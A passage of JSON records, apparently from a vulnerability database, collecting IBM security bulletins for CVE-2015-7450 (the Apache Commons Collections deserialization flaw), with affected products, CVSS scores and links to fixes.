"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-02-05T00:53:36", "id": "E54048B186E2B0430A492A11B734CD6DBAB437E3800A622970DF288484B9F9CA", "href": "https://www.ibm.com/support/pages/node/272959", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:38", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Remote Server. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nFor vulnerability details, see the security bulletin [**_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450) _**](<http://www.ibm.com/support/docview.wss?uid=swg21970575>)**.**\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version(s) \n---|--- \nWebSphere Remote Server \n7.0, 7.1, 7.1.1, 7.1.2, 8.5| WebSphere Application Server \n7.0, 8.0, 8.5, 8.5.5 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:13", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with WebSphere Remote Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:13", "id": "13C3D53BA54035028BA8B6CCC92D57C0C0AFB5754F2A746073C2E64512AF302A", "href": "https://www.ibm.com/support/pages/node/272407", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T01:34:23", "description": "## Summary\n\nMultiple N series products incorporate the Apache Commons Collection library. Versions of Apache Commons Collection before 3.2.2 and including 4.0 are susceptible to a vulnerability that could be exploited to allow remote attackers to execute arbitrary commands on the system. Multiple N series products has addressed the applicable CVEs.\n\n## Vulnerability Details\n\nCVEID: CVE-2015-7450 \nDESCRIPTION: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nN series Snap Creator Framework: 3.6.0, 4.1.0, 4.1.2, 4.3; \nSnapManager for Oracle: 3.2, 3.3, 3.3.1, 3.4; \nSnapManager for SAP: 3.2, 3.3, 3.3.1; \nVirtual Storage Console for VMware vSphere: 6.0, 6.1, 6.2;\n\n## Remediation/Fixes\n\nFor N series Snap Creator Framework: the fix exists from microcode version 4.3P1; \nFor SnapManager for Oracle: the fix exists from microcode version 3.4P2; \nFor SnapManager for SAP: the fix exists from microcode version 3.4P2; \nFor Virtual Storage Console for VMware vSphere: the fix exists from microcode version: 6.2.1; \nPlease contact IBM support or go to this [_link_](<https://www-945.ibm.com/support/fixcentral/>) to download a supported release.\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T00:28:37", "type": "ibm", "title": "Security Bulletin: Apache Commons Collection Java Deserialization Vulnerability in Multiple N series Products", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T00:28:37", "id": "C03FA5EBB009D6B1F8AADC24B78B9ABD8ADACBA78E030EBADE0D37E5B4B8531B", "href": "https://www.ibm.com/support/pages/node/696467", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:53:08", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by FSM.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nFlex System Manager 1.3.4.x \nFlex System Manager 1.3.3.x \nFlex System Manager 1.3.2.x\n\n## Remediation/Fixes\n\nIBM recommends updating the FSM using the instructions referenced in this table. \n \n\n\nProduct | \n\nVRMF | \n\nAPAR | \n\nRemediation \n---|---|---|--- \nFlex System Manager| \n\n1.3.4.x | \n\nIT12598\n\n| Install [fsmfix_1.3.4.0_IT12598_IT15244_IT15245](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.4.0_IT12598_IT15244_IT15245&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFlex System Manager| \n\n1.3.3.x | \n\nIT12598\n\n| Install [fsmfix_1.3.3.0_IT12598_IT15244_IT15245](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.3.0_IT12598_IT15244_IT15245&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFlex System Manager| \n\n1.3.2.x | \n\nIT12598\n\n| Install [fsmfix_1.3.2.0_IT12598_IT15244_IT15245](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.2.0_IT12598_IT15244_IT15245&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFor 1.1.x.x, 1.2.x.x, 1.3.0.x and 1.3.1.x IBM recommends upgrading to a fixed, supported version/release of the product. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:32:21", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Commons affects IBM Flex System Manager(FSM) (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T01:32:21", "id": "06457DA2FE08EC56407EF05C2EAAA9080634D44807C2A8ABBDEA18DCD9364BAC", "href": "https://www.ibm.com/support/pages/node/628965", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:42", "description": "## Summary\n\nWebSphere Service Registry and Repository and WebSphere Application Server are shipped as a component of IBM SOA Policy Gateway Pattern for AIX Server 2.5 and IBM SOA Policy Gateway Pattern for Red Hat Enterprise Linux Server. Information about a security vulnerability affecting WebSphere Service Registry and Repository and WebSphere Application Server have been published in security bulletins. \n\n## Vulnerability Details\n\nPlease consult these security bulletins: \n \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Service Registry and Repository (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21971580>) \n \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) \n \nfor vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nIBM SOA Policy Gateway Pattern for AIX Server 2.5 \nIBM SOA Policy Gateway Pattern for Red Hat Enterprise Linux Server 2.5 \nIBM SOA Policy Gateway Pattern for Red Hat Enterprise Linux Server 2.0 \n \nAll affected by WebSphere Service Registry and Repository V8.0 and WebSphere Application Server V8.0\n\n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:15", "type": "ibm", "title": "Security Bulletin: Vulnerabilities identified in WebSphere Service Registry and Repository and WebSphere Application Server shipped with IBM SOA Policy Gateway Pattern for AIX Server and Red Hat Enterprise Linux Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:15", "id": "3EF919878669EE41DD08409B9AA0E2DAA0F0DBC40CFE18712D5924A93F1806CF", "href": "https://www.ibm.com/support/pages/node/273483", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:40:55", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Rational Business Developer.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nRational Business Developer: 8.5 - 9.5\n\n## Remediation/Fixes\n\n_Product_\n\n| \n\n_VRMF_ | \n\n_APAR_ | \n\n_Remediation/First Fix_ \n---|---|---|--- \n \nRational Business Developer\n\n| 9.5.x| none| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.5.0&platform=All&function=fixId&fixids=Rational-RBD95-CVE-2015-7450-ifix&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.5.0&platform=All&function=fixId&fixids=Rational-RBD95-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \n \nRational Business Developer\n\n| 9.1.x| none| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.1.0&platform=All&function=fixId&fixids=Rational-RBD91-CVE-2015-7450-ifix&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.1.0&platform=All&function=fixId&fixids=Rational-RBD91-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \n \nRational Business Developer\n\n| 9.0.x| none| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.0.1&platform=All&function=fixId&fixids=Rational-RBD90-CVE-2015-7450-ifix&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=9.0.1&platform=All&function=fixId&fixids=Rational-RBD90-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \n \nRational Business Developer\n\n| 8.5.x| none| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=8.5.0&platform=All&function=fixId&fixids=Rational-RBD85-CVE-2015-7450-ifix&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Business+Developer&release=8.5.0&platform=All&function=fixId&fixids=Rational-RBD85-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nIBM recommends that you review your entire environment to identify vulnerable \n\n## Workarounds and Mitigations\n\nnone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-03T04:23:43", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational Business Developer (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-08-03T04:23:43", "id": "38EA893B1CB49114E3D8196A772DD2EACB1D68746AC3215F7DC912F30D4B3635", "href": "https://www.ibm.com/support/pages/node/273707", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:04", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM InfoSphere Information Server. Information about this security vulnerability has been published in a WebSphere Application Server security bulletin.\n\n## Vulnerability Details\n\nCVEID: [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \nDESCRIPTION: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3, and 11.5 \nIBM InfoSphere FastTrack: versions 11.3 and 11.5 \nIBM InfoSphere Business Glossary: versions 8.5, 8.7, and 9.1 \nIBM InfoSphere Metadata Workbench: versions 8.5, 8.7, and 9.1 \nIBM InfoSphere Information Governance Catalog: versions 11.3 and 11.5 \nIBM ISALite for IBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3, and 11.5\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \nInfoSphere Information Server, FastTrack, Information Governance Catalog| 11.5| JR54719| \\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is115_JR54719_ISF_services_multi>) \n\\--Apply IBM InfoSphere Information Governance Catalog [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is115_JR54719_IGC_server_client_multi>) \n\\--Apply [_Websphere Application Server fix_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) PI52103 for V8.5.0.0 through 8.5.5.7 \n\\--Download and install the latest version of [_ISALite_](<http://www.ibm.com/support/docview.wss?uid=swg24022700>) \n\\--Apply FastTrack [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11501_ft_ru1_services_client_multi>) \nInfoSphere Information Server, FastTrack, Information Governance Catalog| 11.3| JR54719| \\--Apply IBM InfoSphere Information Server version _11.3.1.2_ \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is113_JR54719_ISF_services_multi>) \n\\--Apply IBM InfoSphere Information Governance Catalog [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is113_JR54719_IGC_server_client_multi>) \n\\--Apply [_Websphere Application Server fix_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) PI52103 for V8.5.0.0 through 8.5.5.7 \n\\--Download and install the latest version of [_ISALite_](<http://www.ibm.com/support/docview.wss?uid=swg24022700>) \n\\--Apply FastTrack [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_JR55455_ft_client_win>) \n \n\\--Before upgrading a 11.3 installation to 11.5, if the security patches above have been applied to the system, the Information Server Framework patch must be uninstalled or the Information Server Framework [JR54719 rollback patch](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is113_rollback_JR54719_ISF_services_multi>) must be installed. Next, complete the upgrade to 11.5. Finally, re-install the Information Server Framework patch (you will have to use '-force' if it was not uninstalled), and install the Information Governance Catalog patch for 11.5. \nInfoSphere Information Server, Business Glossary, Metadata Workbench| 9.1| JR54719| \\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is91_JR54719_ISF_services_multi>) \n\\--Apply IBM InfoSphere Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is91_JR54719_MWB_server_client_multi>) \n\\--Apply [_Websphere Application Server fix_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) PI52103 for your installed version \n\\--Download and install the latest version of [_ISALite_](<http://www.ibm.com/support/docview.wss?uid=swg24022700>) \nInfoSphere Information Server, Business Glossary, Metadata Workbench| 8.7| JR54719| \\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is87_JR54719_ISF_services_multi>) \n\\--Apply IBM InfoSphere Business Glossary [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is87_JR54719_BG_server_client_multi>) \n\\--Apply IBM InfoSphere Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is87_JR54719_MWB_server_client_multi>) \n\\--Apply [_Websphere Application Server fix_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) PI52103 for your installed version \n\\--Download and install the latest version of [_ISALite_](<http://www.ibm.com/support/docview.wss?uid=swg24022700>) \nInfoSphere Information Server, Business Glossary, Metadata Workbench, | 8.5| JR54719| \\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is85_JR54719_ISF_services_multi>) \n\\--Apply IBM InfoSphere Business Glossary [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is85_JR54719_BG_server_client_multi>) \n\\--Apply IBM InfoSphere Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is85_JR54719_MWB_server_client_multi>) \n\\--Apply [_Websphere Application Server fix_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) PI52103 for V7.0.0.0 through 7.0.0.39 \n\\--Download and install the latest version of [_ISALite_](<http://www.ibm.com/support/docview.wss?uid=swg24022700>) \n \nNote: The same fix may be listed under multiple vulnerabilities. Installing the fix addresses all vulnerabilities to which the fix applies. Also, some fixes require installing both a fix pack and a subsequent patch. While the fix pack must be installed first, any additional patches required may be installed in any order. \n\n\n_For __IBM InfoSphere Information Server version 8.1 __IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:37:18", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM InfoSphere Information Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T13:37:18", "id": "8B09C9492941B8B6C6FB844862484437C6E439C77EC2B6E2EA1BC5C87B890DBB", "href": "https://www.ibm.com/support/pages/node/272427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:45", "description": "## Summary\n\nIBM WebSphere Application Server Hypervisor Edition is shipped as a deployable component of IBM Workload Deployer. Information about a security vulnerability affecting IBM WebSphere Application Server and IBM WebSphere Application Server Hypervisor Edition has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Workload Deployer 3.1.0.7| IBM WebSphere Application Server Hypervisor Edition7.0 \nIBM WebSphere Application Server Hypervisor Edition 8.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:12", "type": "ibm", "title": "Security Bulletin:A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Workload Deployer (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:12", "id": "BBC19469EB9B90D82D15BF345DE6BD2F2984CAE6A5427AAEAFBF0699FD85D085", "href": "https://www.ibm.com/support/pages/node/272253", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:01", "description": "## Summary\n\nEmbedded Websphere Application Server (eWAS) is shipped as a component of Tivoli Netcool/OMNIbus WebGUI. Information about a security vulnerability affecting eWAS has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| **Affected Supporting Product and Version** \n---|--- \nWebGUI 7.3.1 GA and FP| embedded Websphere Application Server 7.0 \nWebGUI 7.4.0 GA and FP| embedded Websphere Application Server 7.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:17", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in embedded IBM WebSphere Application Server shipped with Tivoli Netcool/OMNIbus WebGUI (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": 